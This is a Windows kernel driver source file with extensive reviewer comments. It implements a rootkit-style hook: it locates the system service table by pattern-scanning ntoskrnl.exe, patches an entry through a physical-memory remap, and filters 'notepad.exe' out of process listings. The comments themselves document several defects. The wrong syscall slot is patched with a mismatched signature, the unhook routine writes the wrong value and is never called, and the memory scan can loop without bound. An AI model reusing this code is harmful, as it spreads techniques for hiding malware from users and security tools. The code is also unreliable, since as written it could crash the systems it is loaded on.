
| #include <ntifs.h> #include "C:\D\test\CC++\cc++lib\driver\def.h"
/*
 * Forward declarations for the service-table patching helpers and the
 * replacement NtQuerySystemInformation defined further down.
 *
 * DebugMessage, NtQuerySystemInformation and NtOpenProcess are used in this
 * file without a visible declaration; presumably they come from def.h or
 * ntifs.h — confirm.
 */
VOID GetSSDT0(PVOID* addr);
BOOLEAN HookSSDT_On(PVOID newfunc, PVOID hkfunc, PVOID* oldbase, PULONG oldoffset);
VOID HookSSDT_Off(PVOID oldbase, ULONG oldoffset);
NTSTATUS NTAPI MyNtQuerySystemInformation(
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);
VOID TestHideProcess();
/*
 * Driver teardown: only logs.  The table entry patched by TestHideProcess is
 * not restored here (HookSSDT_Off is never called in this file), so after the
 * image is unloaded the patched slot still refers to this driver's code.
 */
NTSTATUS DriverUnload(PDRIVER_OBJECT pdriver)
{
    DbgPrint("unload...\n");
    return STATUS_SUCCESS;
}

/* Driver object saved by DriverEntry; GetSSDT0 reads its DriverSection. */
static PDRIVER_OBJECT g_pdriver = NULL;

/*
 * Entry point: registers DriverUnload, stores the driver object and installs
 * the hook through TestHideProcess.  `path` is unused.  Returns STATUS_SUCCESS
 * unconditionally, whether or not the hook was installed.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pdriver, PUNICODE_STRING path)
{
    pdriver->DriverUnload = DriverUnload;
    DbgPrint("loading...\n");
    g_pdriver = pdriver;
    TestHideProcess();;   /* the second ';' is an empty statement */
    return STATUS_SUCCESS;
}

/*
 * Locate a table address by pattern-scanning the kernel image.
 *
 * Walks the loader module list starting from this driver's DriverSection
 * (treated as an LDR_DATA_TABLE_ENTRY) via InLoadOrderLinks.Flink until an
 * entry whose BaseDllName equals "ntoskrnl.exe" (case-insensitive) is found,
 * then scans that image for the byte sequence 4C 8D 15 followed, 7 bytes
 * later, by 4C 8D 1D.  On a match the 32-bit value 4 bytes before the end of
 * the second sequence is added to that end address and stored through `addr`
 * (i.e. it is treated as a RIP-relative displacement).
 *
 * @param addr  Receives the computed address.  Left untouched when the
 *              kernel module is not found or the pattern never matches, so
 *              callers must pre-initialise it (HookSSDT_On passes a
 *              NULL-initialised slot and checks it afterwards).
 *
 * Reviewer notes:
 *  - The DbgPrint format string is "wZ\n" (no '%'), so the name argument is
 *    never formatted.
 *  - The displacement is read as an unsigned ULONG.
 *  - `i` counts loop iterations while `start` can advance by more than one
 *    byte per iteration, so the scan is not strictly bounded to SizeOfImage;
 *    and `start` only advances inside the MmIsAddressValid branch, so an
 *    invalid address leaves the loop spinning in place for the remaining
 *    iterations.
 *  - Whether the resulting address is the service-table descriptor that
 *    HookSSDT_On expects is not verified anywhere.
 */
VOID GetSSDT0(PVOID* addr)
{
    PLDR_DATA_TABLE_ENTRY entry = (PLDR_DATA_TABLE_ENTRY)g_pdriver->DriverSection;
    PLDR_DATA_TABLE_ENTRY head = entry;
    UNICODE_STRING temp = { 0 };
    RtlInitUnicodeString(&temp, L"ntoskrnl.exe");
    PCHAR start = NULL;
    ULONG size = 0;

    /* Find the kernel's loader entry; start/size stay NULL/0 if absent. */
    do {
        if (RtlCompareUnicodeString(&temp, &entry->BaseDllName, TRUE) == 0) {
            DbgPrint("wZ\n", &entry->BaseDllName);
            start = (PCHAR)entry->DllBase;
            size = entry->SizeOfImage;
            break;
        }
        entry = entry->InLoadOrderLinks.Flink;
    } while (entry != head);

    /* Byte scan for the two 7-byte instruction patterns described above. */
    for (size_t i = 0; i < size; i++) {
        if (MmIsAddressValid(start)) {
            if (*start == (CHAR)0x4c && *(start + 1) == (CHAR)0x8d && *(start + 2) == (CHAR)0x15) {
                start += 7;
                if (MmIsAddressValid(start)) {
                    if (*start == (CHAR)0x4c && *(start + 1) == (CHAR)0x8d && *(start + 2) == (CHAR)0x1d) {
                        start += 7;
                        if (MmIsAddressValid(start)) {
                            /* start is just past the second pattern;
                             * start - 4 is its 32-bit displacement field. */
                            *addr = (ULONG64)start + *(PULONG)(start - 4);
                            return;
                        }
                    }
                }
            }
            start++;
        }
    }
}
/*
 * Patch one service-table entry so that the slot whose current target is
 * `hkfunc` refers to `newfunc` instead.
 *
 * The address from GetSSDT0 is read as: *(PULONG64)ssdt = base of an array of
 * 32-bit entries, *(PULONG)(ssdt + 0x10) = number of entries (presumably —
 * confirm against the table layout).  Each entry is interpreted as
 * (offset << 4) relative to that base.
 *
 * @param newfunc    Replacement routine.
 * @param hkfunc     Routine whose slot is to be replaced.
 * @param oldbase    Receives the address that was written to.
 * @param oldoffset  Receives the entry's original 32-bit value.
 * @return TRUE once a slot was patched, FALSE if no entry matched.  The bare
 *         `return;` on the GetSSDT0 failure path returns no value from a
 *         BOOLEAN function (a constraint violation in standard C; MSVC
 *         accepts it with a warning), so the result on that path is not
 *         meaningful.
 *
 * Reviewer notes:
 *  - The address stored in *oldbase is base + sizeof(ULONG) + 1 (base + 5)
 *    and does not depend on the loop index i.
 *  - The write goes through a fresh MmMapIoSpace mapping of the physical
 *    page rather than the table's existing virtual mapping; the MmMapIoSpace
 *    result is not NULL-checked.  A write of this kind to the service table
 *    is exactly what kernel-integrity monitoring is meant to detect.
 */
BOOLEAN HookSSDT_On(PVOID newfunc, PVOID hkfunc, PVOID* oldbase, PULONG oldoffset)
{
    PVOID ssdt = NULL;
    GetSSDT0(&ssdt);
    if (!ssdt)return;
    ULONG index = *(PULONG)((ULONG64)ssdt + 0x10);   /* entry count */
    ULONG offset = 0;
    PVOID pfunc = NULL;
    for (size_t i = 0; i < index; i++) {
        /* i-th 32-bit entry; its target is base + (entry >> 4). */
        offset = ((PULONG) * (PULONG64)ssdt)[i];
        (ULONG64)pfunc = *(PULONG64)ssdt + (offset >> 4);   /* cast-as-lvalue: MSVC extension */
        if (hkfunc == pfunc) {
            *oldbase = *(PULONG64)ssdt + sizeof(ULONG) + 1;
            *oldoffset = offset;
            offset = (ULONG64)newfunc - *(PULONG64)ssdt;
            PHYSICAL_ADDRESS physical = MmGetPhysicalAddress(*oldbase);
            PVOID map = MmMapIoSpace(physical, 0x10, MmCached);
            *(PULONG)map = offset << 4;
            DebugMessage("挂钩完成\n");   /* "hook complete" */
            MmUnmapIoSpace(map, 0x10);
            return TRUE;
        }
    }
    return FALSE;
}

/*
 * Intended counterpart of HookSSDT_On: writes a 32-bit value back through a
 * physical mapping of `oldbase`.
 *
 * @param oldbase    Address to write to, as stored by HookSSDT_On.
 * @param oldoffset  Unused: the value actually written is `oldbase` itself,
 *                   narrowed to ULONG, not `oldoffset`.
 *
 * Not called anywhere in this file (DriverUnload does not invoke it).
 * The MmMapIoSpace result is not NULL-checked.
 */
VOID HookSSDT_Off(PVOID oldbase, ULONG oldoffset)
{
    PHYSICAL_ADDRESS physical = MmGetPhysicalAddress(oldbase);
    PVOID map = MmMapIoSpace(physical, 0x10, MmCached);
    *(PULONG)map = oldbase;   /* writes the pointer value, not oldoffset */
    DebugMessage("卸载完成\n");   /* "unload complete" */
    MmUnmapIoSpace(map, 0x10);
}
/*
 * Replacement NtQuerySystemInformation that filters process listings.
 *
 * Forwards to NtQuerySystemInformation (called directly, not through the
 * patched table, so the hook does not recurse) and, when the query was
 * SystemProcessInformation and succeeded, unlinks every
 * SYSTEM_PROCESS_INFORMATION entry whose ImageName contains the substring
 * "notepad.exe" by folding its NextEntryOffset into the previous entry.
 *
 * Parameters and return value are those of NtQuerySystemInformation; the
 * status of the underlying call is returned unchanged.
 *
 * Reviewer notes:
 *  - TestHideProcess passes NtOpenProcess as the slot to replace and this
 *    routine as the replacement; the two have different parameter lists.
 *  - wcsstr requires a NUL-terminated string.  ImageName.Buffer is a
 *    UNICODE_STRING buffer, which is not guaranteed to be NUL-terminated,
 *    and it is not checked for NULL here — verify what the enumerated
 *    entries actually carry.
 *  - wcsstr is a substring match, so any image name containing
 *    "notepad.exe" matches.
 *  - When the matching entry is the first one (pPrev == NULL), the
 *    assignments modify only the local copy of the SystemInformation
 *    parameter; the caller's buffer is unchanged.
 */
NTSTATUS NTAPI MyNtQuerySystemInformation(
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
)
{
    NTSTATUS status = NtQuerySystemInformation(
        SystemInformationClass,
        SystemInformation,
        SystemInformationLength,
        ReturnLength
    );
    /* Only successful process-list queries are rewritten. */
    if (!NT_SUCCESS(status) || SystemInformationClass != SystemProcessInformation) return status;

    PSYSTEM_PROCESS_INFORMATION pCurrent = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
    PSYSTEM_PROCESS_INFORMATION pPrev = NULL;

    while (pCurrent) {
        if (wcsstr(pCurrent->ImageName.Buffer, L"notepad.exe")) {
            if (pPrev) {
                /* Skip pCurrent by extending the previous link; a zero
                 * NextEntryOffset terminates the list. */
                if (pCurrent->NextEntryOffset) pPrev->NextEntryOffset += pCurrent->NextEntryOffset;
                else pPrev->NextEntryOffset = 0;
            } else {
                /* First entry: only the local parameter copy is changed. */
                if (pCurrent->NextEntryOffset) (PUCHAR)SystemInformation += pCurrent->NextEntryOffset;
                else SystemInformation = NULL;
            }
        } else {
            pPrev = pCurrent;
        }
        /* Advance along the original chain; a zero offset ends it. */
        if (pCurrent->NextEntryOffset == 0) break;
        pCurrent = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)pCurrent + pCurrent->NextEntryOffset);
    }
    return status;
}

/* Address written and original entry value recorded by HookSSDT_On.  They are
 * never read back in this file (HookSSDT_Off is not called). */
PVOID hkbase = NULL;
ULONG hkoffset = 0;
/*
 * Install the hook: the table slot whose current target is NtOpenProcess is
 * repointed at MyNtQuerySystemInformation, and the written address and the
 * original entry value are saved in hkbase/hkoffset.  The BOOLEAN result of
 * HookSSDT_On is discarded, so a failed install is not reported.
 */
VOID TestHideProcess()
{
    PVOID replacement = (PVOID)MyNtQuerySystemInformation;
    PVOID target = (PVOID)NtOpenProcess;

    (VOID)HookSSDT_On(replacement, target, &hkbase, &hkoffset);
}